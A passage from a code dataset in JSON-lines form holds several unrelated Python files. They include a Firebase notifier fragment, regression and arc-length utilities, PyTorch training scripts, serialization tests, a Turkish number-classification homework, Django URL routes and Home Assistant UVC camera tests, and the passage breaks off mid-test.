\"https://fcm.googleapis.com/fcm/send\"\n\n if \"title\" not in data:\n data[\"title\"] = body\n\n params = {\n \"data\": data,\n 
\"notification\": {\n \"body\": body,\n \"sound\": \"bell.mp3\"\n },\n \"registration_ids\": firebase_tokens # this is list token [token]\n }\n\n print(\"send_firebase_notify param: \", params)\n\n async with aiohttp.ClientSession(headers=fb_headers, json_serialize=ujson.dumps) as session:\n async with session.post(url, json=params) as response:\n # if response.status == 200:\n await response.json()\n","sub_path":"application/controllers/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453518677","text":"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import integrate\n\n\n\ndef readRawData(rawmap):\n '''\n :param rawmap\n :return: array with points [(x1,y1),(x2,y2), ... , (xn,yn)]\n '''\n r = open(rawmap, 'r')\n with r as f:\n map = []\n for line in f:\n line = line.split() # to deal with blank\n if line:\n line = [float(i) for i in line]\n map.append(line)\n return np.array(map)\n\n\ndef ordinary_LR( coord, order, p):\n '''\n Regression such that y(x=0)=0\n Assumed data is a n x 2 matrix of vector coordinates (x_i,y_i)\n returns beta = [b_0,b_1,..., b_k]\n\n data_x = x_0, x_1, ... , x_n\n data_y = y_0, y_1, ... , y_n\n\n '''\n q = order\n data_x = coord.T[0]\n data_y = coord.T[1]\n\n n = len(data_x)\n\n # n rows, q columns\n X = np.zeros((n, q))\n\n # X Matrix; X[i][0] = 0 , X[i][1] = X_i^1 , X[i][2] = X_i^2, ... , X[i][k] = X_i^q\n for i in range(0, n): # rows\n for j in range(0, q): # columns\n X[i][j] = data_x[i] ** (j+1)\n\n temp = np.matmul(X.T, X)\n temp = np.matmul(np.linalg.inv(temp), X.T)\n b = np.append([0], np.matmul(temp, data_y))\n\n\n return b\n\n\ndef cart2polar(C): # Transforming cartesian to polar, (-pi,pi)\n\n r = (C.T[0] ** 2 + C.T[1] ** 2) ** (1 / 2)\n P = np.zeros((len(C), 2))\n P.T[0] = r\n\n # Finding relation between x and y\n for i in range(len(C)):\n if (C[i][0] == 0) and (C[i][1] != 0):\n P[i][1] = np.pi / 2\n elif (C[i][1] == 0) and (C[i][0] == 0):\n P[i][1] = 0\n else:\n P[i][1] = np.arctan(abs(C[i][1] / C[i][0]))\n\n # Checking for every quadrant to get the correct angle theta_cone\n if (C[i][0] >= 0) and (C[i][1] > 0):\n P[i][1] = P[i][1]\n\n elif (C[i][0] < 0) and (C[i][1] <= 0):\n P[i][1] = P[i][1] - np.pi\n\n elif (C[i][0] >= 0) and (C[i][1] < 0):\n P[i][1] = - P[i][1]\n\n elif (C[i][0] < 0) and (C[i][1] >= 0):\n P[i][1] = np.pi - P[i][1]\n\n return P\n\n\n\n\ndef arcLengthSimpsonsMethod2(b, x_1):\n\n n = 10\n x_0 = 0\n h = (x_0 - x_1)/n\n\n def f(x):\n if len(b)>2:\n return b[0] + b[1]*x + b[2]*x**2\n else:\n return b[0] + b[1] * x\n def df(x):\n return (f(x+h) - f(x))/h\n def l(x):\n return np.sqrt(1+df(x)**2)\n\n L,e = integrate.quad(l, x_0, x_1)\n\n return L\n\n\n\n\n\n\n\n#b = np.array([0,1/2,1])\n#arcLengthSimpsonsMethod2(b,4)\n\n#SimpsonsMethod2(b,1)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101409267","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom dataset import MyDataset\nfrom supervised_model import SModel\n\nprefix = \"/home/r720/Data/imagedata/\"\ntraindir = prefix + \"train/\"\nvaldir = prefix + \"val/\"\n\n\ndef train_label_transformer(data):\n return data * (1 + 
(np.random.randint(-5, 6) / 100) )\n\n\ndef fake_transformer(data):\n return data\n\n\ndef train_img_transformer(data):\n return data / 127.5 - 1\n\n\nimg_trans = transforms.Compose([\n # transforms.Resize(60, 200),\n transforms.ToTensor()\n # transforms.Normalize(mean = (0.5, 0.5, 0.5), std = (0.5, 0.5, 0.5))\n])\n\nlabel_trans = transforms.Compose([\n train_label_transformer\n])\ndef train(model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n l2_reg = torch.zeros(1, requires_grad=True).to(device)\n # print(data.shape, target.shape)\n target = target.reshape((target.shape[0], 1))\n target = target.float()\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n # print(output)\n # print(target)\n # loss = nn.MSELoss()(output, target)\n for w in model.parameters():\n # print(w)\n l2_reg = l2_reg + w.norm(2)\n # print(len(data))\n loss = (1 / len(data)) * (target - output).pow(2).sum() + l2_reg * 0.001\n loss.backward()\n optimizer.step()\n if batch_idx % 10 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef val(model, device, val_loader, epoch):\n model.eval()\n for batch_idx, (data, target) in enumerate(val_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n loss = nn.MSELoss()(output, target)\n print('Train Epoch: {} Val Loss: {:.7f}'.format(epoch, loss.item()))\n break\n\ndevice = torch.device('cuda:0')\nmodel = SModel()\n# model.load_state_dict(torch.load(\"nvidiasmodel/nvidia-200.dat\"))\nmodel.to(device)\nmodel.train()\n\ntraindata = MyDataset(traindir, transform=img_trans, target_transform=label_trans)\nvaldata = MyDataset(valdir, transform=img_trans, target_transform=transforms.ToTensor)\ntrain_loader = DataLoader(traindata, 64, True)\nval_loader = DataLoader(valdata, 64, True)\n\nepochs = 300\noptimizer = optim.Adam(model.parameters(), lr=0.00001)\nfor epoch in range(epochs):\n train(model, device, train_loader, optimizer, epoch)\n if epoch % 100 == 0:\n # model.eval()\n # for images, labels in dataloader(valdir, valfiles, len(valfiles), \"val\"):\n # ps = model(images)\n # print(\"epoch {} val loss {}\".format(i, loss_func(ps, labels)))\n state = model.state_dict()\n for key in state: state[key] = state[key].clone().cpu()\n torch.save(state, 'nvidiasmodel/{0}-{1}.dat'.format(\"nvidial2\", epoch))","sub_path":"supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610401890","text":"import logging\nimport os\nimport sys\nimport h5py\nimport argparse\n\nimport numpy as np\nimport torch\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader, sampler\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.tensorboard.writer import SummaryWriter\n\nimport indexedconv.utils as utils\nfrom indexedconv.nets.aid import WideNetMasked\n\n\ndef train(model, device, train_loader, optimizer, epoch, writer=None):\n model.train()\n loss_values = []\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss_values.append(loss.item())\n loss.backward()\n 
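# backward() has populated the gradients; step() applies the optimizer update\n 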
optimizer.step()\n if batch_idx % 20 == 0:\n logger.info('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.sampler),\n 100. * batch_idx / len(train_loader), loss.item()))\n if writer:\n writer.add_scalars('Loss', {'training': np.mean(loss_values)}, epoch)\n\n\ndef test(model, device, test_loader, epoch, val=True, writer=None):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.sampler)\n accuracy = 100. * correct / len(test_loader.sampler)\n if val:\n logger.info('Validation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n test_loss, correct, len(test_loader.sampler), accuracy))\n if writer:\n writer.add_scalars('Loss', {'validating': test_loss}, epoch)\n writer.add_scalar('Accuracy', accuracy, epoch)\n else:\n logger.info('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n test_loss, correct, len(test_loader.sampler), accuracy))\n\n\nif __name__ == '__main__':\n\n description = 'Demonstration of the use of masked convolution on hexagonal images. A ResNet like network is ' \\\n 'trained for a classification task on the AID dataset.'\n # Parse script arguments\n print('parse arguments')\n parser = argparse.ArgumentParser(\n description=description\n )\n parser.add_argument(\"main_directory\", help=\"path to the main directory of the experiments\")\n parser.add_argument(\"data_directory\", help=\"path to the data directory\")\n parser.add_argument(\"exp_name\", help=\"name of the experiment\")\n parser.add_argument('--batch', help='batch size', type=int, default=125)\n parser.add_argument('--epochs', help='number of epochs', type=int, default=300)\n parser.add_argument('--seeds', nargs='+', help='seeds to use, one training per seed', type=int,\n default=range(1, 11))\n parser.add_argument('--device', help='device to use, for example cpu or cuda:0', type=str, default='cuda:0')\n parser.add_argument('--size', help='size of the resized AID images', type=int, default=64)\n parser.add_argument('--val_ratio', help='validating ratio', type=float, default=0.2)\n\n args = parser.parse_args()\n\n main_directory = args.main_directory\n data_directory = args.data_directory\n experiment_name = args.exp_name\n batch_size = args.batch\n max_epochs = args.epochs\n seeds = args.seeds\n device = torch.device(args.device)\n resize_size = (args.size, args.size)\n validating_ratio = args.val_ratio\n\n if not os.path.exists(main_directory):\n os.makedirs(main_directory)\n\n experiment_directory = main_directory + '/' + experiment_name\n if not os.path.exists(experiment_directory):\n os.makedirs(experiment_directory)\n\n # Logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(levelname)s] - %(message)s')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n formatter_file = logging.Formatter('%(asctime)s [%(levelname)s] - %(message)s')\n file_handler = logging.FileHandler('{}/{}/{}.log'.format(main_directory,\n experiment_name,\n experiment_name))\n file_handler.setFormatter(formatter_file)\n 
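# register the file handler too, so each run logs both to stdout and to its log file\n 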
logger.addHandler(file_handler)\n\n # Experiment parameters\n logger.info('batch_size : {}'.format(batch_size))\n logger.info('max_epochs : {}'.format(max_epochs))\n logger.info('cuda available : {}'.format(torch.cuda.is_available()))\n\n # Data\n logger.info('Axial AID with nn.conv2d masked')\n\n if not os.path.exists(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5'):\n logger.info('Create hexagonal AID dataset')\n img, _ = datasets.ImageFolder(data_directory + '/AID',\n transform=transforms.Compose([transforms.Resize(resize_size),\n transforms.ToTensor()]))[0]\n index_matrix = utils.square_to_hexagonal_index_matrix(img)\n aid = datasets.ImageFolder(data_directory + '/AID',\n transform=transforms.Compose([transforms.Resize(resize_size),\n transforms.ToTensor(),\n utils.SquareToHexa()]))\n with h5py.File(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5', 'w') as f:\n images = []\n labels = []\n for i in range(len(aid)):\n image, label = aid[i]\n images.append(image.numpy())\n labels.append(label)\n f.create_dataset('images', data=np.array(images))\n f.create_dataset('labels', data=np.array(labels))\n f.attrs['index_matrix'] = index_matrix\n f.attrs['class_names'] = np.array(aid.classes, dtype=h5py.special_dtype(vlen=str))\n\n # load hexagonal cifar\n f = h5py.File(data_directory + '/aid' + str(resize_size[0]) + '_hexa.h5', 'r')\n data = f['images'][()]\n labels = f['labels'][()]\n index_matrix = torch.tensor(f.attrs['index_matrix'])\n class_names = f.attrs['class_names']\n f.close()\n\n # Normalize data\n data = utils.normalize(data)\n\n data_shifted = np.zeros(data.shape[0:2] + index_matrix.shape).astype(np.float32)\n for i in range(index_matrix.shape[0]):\n for j in range(index_matrix.shape[1]):\n if not int(index_matrix[i, j]) == -1:\n data_shifted[:, :, i, j] = data[:, :, int(index_matrix[i, j])]\n\n # Datasets\n dataset = utils.NumpyDataset(data_shifted, labels, transform=utils.NumpyToTensor())\n\n # Run the experiments\n for seed in seeds:\n # Data loaders\n logger.info('Split data with seed {}'.format(seed))\n torch.manual_seed(seed)\n np.random.seed(seed)\n train_indices = []\n val_indices = []\n for cls in np.unique(labels):\n indices = np.where(labels == cls)\n indices = np.random.permutation(indices[0])\n train_indices.append(indices[:int(len(indices) * (1 - validating_ratio))])\n val_indices.append(indices[int(len(indices) * (1 - validating_ratio)):])\n train_set_sampler = sampler.SubsetRandomSampler(np.concatenate(train_indices))\n validating_set_sampler = sampler.SubsetRandomSampler(np.concatenate(val_indices))\n train_loader = DataLoader(dataset, batch_size=batch_size, sampler=train_set_sampler, num_workers=8)\n val_loader = DataLoader(dataset, batch_size=batch_size, sampler=validating_set_sampler, num_workers=8)\n\n # TensorboardX writer\n writer = SummaryWriter(main_directory + '/runs/' + experiment_name + '_' + str(seed))\n\n # The model\n torch.manual_seed(0)\n model = WideNetMasked(len(class_names)).to(device)\n logger.info('Net parameters number : {}'.format(utils.compute_total_parameter_number(model)))\n\n optimizer = optim.SGD(model.parameters(), lr=0.05, momentum=0.9, weight_decay=0.001)\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[50, 100, 150], gamma=0.1)\n\n # Train and test\n logger.info('Start training')\n for epoch in range(1, max_epochs + 1):\n gpu_map = utils.get_gpu_usage_map(0)\n logger.info('GPU usage : {}'.format(gpu_map))\n train(model, device, train_loader, optimizer, epoch, writer=writer)\n test(model, device, 
val_loader, epoch, writer=writer)\n scheduler.step(epoch=epoch)\n if epoch % 100 == 0:\n torch.save(model.state_dict(), experiment_directory + '/model_' + str(seed) + '_epoch_' + str(epoch))\n\n writer.close()\n","sub_path":"examples/aid_standard_masked.py","file_name":"aid_standard_masked.py","file_ext":"py","file_size_in_byte":9222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"351420490","text":"\"\"\"\nType instances should have raw-bytes easily available without the \"type/length\" header.\n\"\"\"\nimport pytest\n\nimport x690.types as t\n\n\n@pytest.mark.parametrize(\"cls\", t.Type.all())\ndef test_raw_bytes_after_decode(cls):\n try:\n instance = cls.decode(b\"\")\n except NotImplementedError:\n pytest.skip(\"Not yet implemented\")\n assert instance.raw_bytes == b\"\"\n\n\n@pytest.mark.parametrize(\"cls\", t.Type.all())\ndef test_raw_bytes_default_instance(cls):\n instance = cls()\n assert isinstance(instance.raw_bytes, bytes)\n","sub_path":"tests/test_rawbytes.py","file_name":"test_rawbytes.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106266927","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 10 00:54:35 2019\n\n@author: HP\n\"\"\"\n\n# 1) HOMEWORK 1: Define the 4 functions whose properties are described below.\n\n# A function that checks whether a number is odd,\n# a function that checks whether a number is even,\n# a function that checks divisibility by 3,\n# a function that checks divisibility by 5.\n# Besides these, write a 5th function that takes two parameters named ilksayi (start) and sonsayi (end).\n\n# Do the work by running the first 4 functions inside the last function you created. \n# That function should build a list from the start and end numbers you give it and \n# check the numbers in the list for the odd - even - multiple of 3 - multiple of 5 cases. 
\n# In the appropriate cases it should call the relevant function and print an output for that case.\n\n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\ndef sayi_kontrol(ilksayi,sonsayi):\n liste = list(range(ilksayi,sonsayi))\n print(\"\\nListe =\",liste,'\\n')\n Tek =list(map(lambda x: f'{x} tek sayidir\\n' , filter(lambda a: a % 2 == 1, liste)))\n Cift =list(map(lambda y: f'{y} cift sayidir\\n' , filter(lambda b: b % 2 == 0, liste)))\n Uckat =list(map(lambda z: f'{z} ucun katidir\\n' , filter(lambda c: c % 3 == 0, liste)))\n Beskat=list(map(lambda t: f'{t} besin katidir\\n', filter(lambda d: d % 5 == 0, liste)))\n print(*Tek,*Cift,*Uckat,*Beskat)\nsayi_kontrol(ilksayi,sonsayi) \n\n\n# %% Second way, calling the checker lambdas inside the 5th function;\n\ntek =lambda a: a % 2 == 1\ncift =lambda b: b % 2 == 0\nuckat =lambda c: c % 3 == 0\nbeskat=lambda d: d % 5 == 0\n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\nprint('\\nSonuclar...;')\ndef secim(ilksayi,sonsayi):\n for sayi in range(ilksayi,sonsayi):\n if tek(sayi)==True:\n print(f'{sayi} tekdir')\n if cift(sayi)==True:\n print(f'{sayi} cifttir')\n if uckat(sayi)==True:\n print(f'{sayi} ucun katidir')\n if beskat(sayi)==True:\n print(f'{sayi} besin katidir')\nsecim(ilksayi,sonsayi)\n \n\n# %% Third way, by defining named functions;\n\ndef ciftek(sayi):\n if sayi % 2 == 0:\n print(f'{sayi} cift sayidir...')\n else:\n print(f'{sayi} tek sayidir...')\n\ndef ucmu(sayi):\n if sayi % 3 == 0:\n print(f'{sayi} ucun katidir...')\n\ndef besmi(sayi):\n if sayi % 5 == 0:\n print(f'{sayi} besin katidir...')\n \n \n\nilksayi=int(input(\"Baslangic Sayisi =\"))\nsonsayi=int(input(\"Bitis Sayisi =\"))\nif ilksayi>sonsayi:\n ilksayi,sonsayi=sonsayi,ilksayi\n\ndef sayi_kontrol(ilksayi,sonsayi):\n liste = list(range(ilksayi,sonsayi))\n print(\"\\nListe =\",liste,'\\n')\n for sayi in liste:\n ciftek(sayi)\n ucmu(sayi)\n besmi(sayi)\n \nsayi_kontrol(ilksayi,sonsayi) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Odev1.py","file_name":"Odev1.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519376261","text":"from django.conf.urls import url, include\nfrom app import views\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^demo$', views.test, name=\"test\"),\n url(r'^signup$', views.signup, name=\"signup\"),\n url(r'^login$', views.login, name=\"login\"),\n url(r'^add-blog$', views.add_blog, name=\"add_blog\"),\n url(r'^list-all-blog$', views.list_all_blog, name=\"list_all_blog\"),\n url(r'^detail-blog$', views.detail_blog, name=\"detail_blog\"),\n url(r'^detail-blog/edit-blog$', views.edit_blog, name=\"edit_blog\"),\n url(r'^detail-blog/delete$', views.delete_blog, name=\"delete_blog\"),\n url(r'^detail-blog/comment$', views.comment, name=\"comment\"),\n url(r'^detail-blog/get-comment$', views.get_comment, name=\"get_comment\"),\n url(r'^detail-blog/reply$', views.reply, name=\"reply\"),\n url(r'^detail-blog/get-reply$', views.get_reply, name=\"get_reply\"),\n url(r'^detail-blog/like$', views.like, name=\"like\"),\n url(r'^detail-blog/like-reply$', views.like_reply, name=\"like_reply\"),\n url(r'^home/upload-image$', views.upload_image, name=\"upload_image\"),\n url(r'^home/add-blog$', views.add_blog, name=\"add_blog\"),\n url(r'^home/change-rate$', views.change_rate, name=\"change_rate\"),\n 
url(r'^search$', views.search, name=\"search\"),\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529978123","text":"def filter_list(l):\n # remove the strings from the list in place and return it\n for i in range(len(l)-1, -1, -1):\n if isinstance(l[i], str):\n l.pop(i)\n return l\n\n# alternative: build a new list with a comprehension\n# return [i for i in l if not isinstance(i, str)]\n\ntestcase = [1,2,'a','b']\n\nfilter_list(testcase)\nprint(testcase)","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173452726","text":"\"\"\"The tests for UVC camera module.\"\"\"\nimport socket\nimport unittest\nfrom unittest import mock\n\nimport pytest\nimport requests\nfrom uvcclient import camera, nvr\n\nfrom homeassistant.components.camera import SUPPORT_STREAM\nfrom homeassistant.components.uvc import camera as uvc\nfrom homeassistant.exceptions import PlatformNotReady\nfrom homeassistant.setup import setup_component\n\nfrom tests.common import get_test_home_assistant\n\n\nclass TestUVCSetup(unittest.TestCase):\n \"\"\"Test the UVC camera platform.\"\"\"\n\n def setUp(self):\n \"\"\"Set up things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n self.addCleanup(self.hass.stop)\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_full_config(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with full configuration.\"\"\"\n config = {\n \"platform\": \"uvc\",\n \"nvr\": \"foo\",\n \"password\": \"bar\",\n \"port\": 123,\n \"key\": \"secret\",\n }\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n {\"uuid\": \"three\", \"name\": \"Old AirCam\", \"id\": \"id3\"},\n ]\n\n def mock_get_camera(uuid):\n \"\"\"Create a mock camera.\"\"\"\n if uuid == \"id3\":\n return {\"model\": \"airCam\"}\n return {\"model\": \"UVC\"}\n\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.side_effect = mock_get_camera\n mock_remote.return_value.server_version = (3, 2, 0)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert mock_remote.call_args == mock.call(\"foo\", 123, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"id1\", \"Front\", \"bar\"),\n mock.call(mock_remote.return_value, \"id2\", \"Back\", \"bar\"),\n ]\n )\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_partial_config(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with partial configuration.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n ]\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.return_value = {\"model\": \"UVC\"}\n mock_remote.return_value.server_version = (3, 2, 0)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert 
mock_remote.call_args == mock.call(\"foo\", 7080, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"id1\", \"Front\", \"ubnt\"),\n mock.call(mock_remote.return_value, \"id2\", \"Back\", \"ubnt\"),\n ]\n )\n\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_partial_config_v31x(self, mock_uvc, mock_remote):\n \"\"\"Test the setup with a v3.1.x server.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_cameras = [\n {\"uuid\": \"one\", \"name\": \"Front\", \"id\": \"id1\"},\n {\"uuid\": \"two\", \"name\": \"Back\", \"id\": \"id2\"},\n ]\n mock_remote.return_value.index.return_value = mock_cameras\n mock_remote.return_value.get_camera.return_value = {\"model\": \"UVC\"}\n mock_remote.return_value.server_version = (3, 1, 3)\n\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert mock_remote.call_count == 1\n assert mock_remote.call_args == mock.call(\"foo\", 7080, \"secret\", ssl=False)\n mock_uvc.assert_has_calls(\n [\n mock.call(mock_remote.return_value, \"one\", \"Front\", \"ubnt\"),\n mock.call(mock_remote.return_value, \"two\", \"Back\", \"ubnt\"),\n ]\n )\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n def test_setup_incomplete_config(self, mock_uvc):\n \"\"\"Test the setup with incomplete configuration.\"\"\"\n assert setup_component(self.hass, \"camera\", {\"platform\": \"uvc\", \"nvr\": \"foo\"})\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n assert setup_component(\n self.hass, \"camera\", {\"platform\": \"uvc\", \"key\": \"secret\"}\n )\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n assert setup_component(\n self.hass, \"camera\", {\"platform\": \"uvc\", \"port\": \"invalid\"}\n )\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n @mock.patch(\"uvcclient.nvr.UVCRemote\")\n def setup_nvr_errors_during_indexing(self, error, mock_remote, mock_uvc):\n \"\"\"Set up test for NVR errors during indexing.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_remote.return_value.index.side_effect = error\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert not mock_uvc.called\n\n def test_setup_nvr_error_during_indexing_notauthorized(self):\n \"\"\"Test for error: nvr.NotAuthorized.\"\"\"\n self.setup_nvr_errors_during_indexing(nvr.NotAuthorized)\n\n def test_setup_nvr_error_during_indexing_nvrerror(self):\n \"\"\"Test for error: nvr.NvrError.\"\"\"\n self.setup_nvr_errors_during_indexing(nvr.NvrError)\n pytest.raises(PlatformNotReady)\n\n def test_setup_nvr_error_during_indexing_connectionerror(self):\n \"\"\"Test for error: requests.exceptions.ConnectionError.\"\"\"\n self.setup_nvr_errors_during_indexing(requests.exceptions.ConnectionError)\n pytest.raises(PlatformNotReady)\n\n @mock.patch.object(uvc, \"UnifiVideoCamera\")\n @mock.patch(\"uvcclient.nvr.UVCRemote.__init__\")\n def setup_nvr_errors_during_initialization(self, error, mock_remote, mock_uvc):\n \"\"\"Set up test for NVR errors during initialization.\"\"\"\n config = {\"platform\": \"uvc\", \"nvr\": \"foo\", \"key\": \"secret\"}\n mock_remote.return_value = None\n mock_remote.side_effect = error\n assert setup_component(self.hass, \"camera\", {\"camera\": config})\n self.hass.block_till_done()\n\n assert not mock_remote.index.called\n assert not 
mock_uvc.called\n\n def test_setup_nvr_error_during_initialization_notauthorized(self):\n \"\"\"Test for error: nvr.NotAuthorized.\"\"\"\n self.setup_nvr_errors_during_initialization(nvr.NotAuthorized)\n\n def test_setup_nvr_error_during_initialization_nvrerror(self):\n \"\"\"Test for error: nvr.NvrError.\"\"\"\n self.setup_nvr_errors_during_initialization(nvr.NvrError)\n pytest.raises(PlatformNotReady)\n\n def test_setup_nvr_error_during_initialization_connectionerror(self):\n \"\"\"Test for error: requests.exceptions.ConnectionError.\"\"\"\n self.setup_nvr_errors_during_initialization(requests.exceptions.ConnectionError)\n pytest.raises(PlatformNotReady)\n\n\nclass TestUVC(unittest.TestCase):\n \"\"\"Test class for UVC.\"\"\"\n\n def setup_method(self, method):\n \"\"\"Set up the mock camera.\"\"\"\n self.nvr = mock.MagicMock()\n self.uuid = \"uuid\"\n self.name = \"name\"\n self.password = \"seekret\"\n self.uvc = uvc.UnifiVideoCamera(self.nvr, self.uuid, self.name, self.password)\n self.nvr.get_camera.return_value = {\n \"model\": \"UVC Fake\",\n \"recordingSettings\": {\"fullTimeRecordEnabled\": True},\n \"host\": \"host-a\",\n \"internalHost\": \"host-b\",\n \"username\": \"admin\",\n \"channels\": [\n {\n \"id\": \"0\",\n \"width\": 1920,\n \"height\": 1080,\n \"fps\": 25,\n \"bitrate\": 6000000,\n \"isRtspEnabled\": True,\n \"rtspUris\": [\n \"rtsp://host-a:7447/uuid_rtspchannel_0\",\n \"rtsp://foo:7447/uuid_rtspchannel_0\",\n ],\n },\n {\n \"id\": \"1\",\n \"width\": 1024,\n \"height\": 576,\n \"fps\": 15,\n \"bitrate\": 1200000,\n \"isRtspEnabled\": False,\n \"rtspUris\": [\n \"rtsp://host-a:7447/uuid_rtspchannel_1\",\n \"rtsp://foo:7447/uuid_rtspchannel_1\",\n ],\n },\n ],\n }\n self.nvr.server_version = (3, 2, 0)\n self.uvc.update()\n\n def test_properties(self):\n \"\"\"Test the properties.\"\"\"\n assert self.name == self.uvc.name\n assert self.uvc.is_recording\n assert \"Ubiquiti\" == self.uvc.brand\n assert \"UVC Fake\" == self.uvc.model\n assert SUPPORT_STREAM == self.uvc.supported_features\n\n def test_stream(self):\n \"\"\"Test the RTSP stream URI.\"\"\"\n stream_source = yield from self.uvc.stream_source()\n assert stream_source == \"rtsp://foo:7447/uuid_rtspchannel_0\"\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login(self, mock_camera, mock_store):\n \"\"\"Test the login.\"\"\"\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == mock.call(\"host-a\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClient\")\n def test_login_v31x(self, mock_camera, mock_store):\n \"\"\"Test login with v3.1.x server.\"\"\"\n self.nvr.server_version = (3, 1, 3)\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == 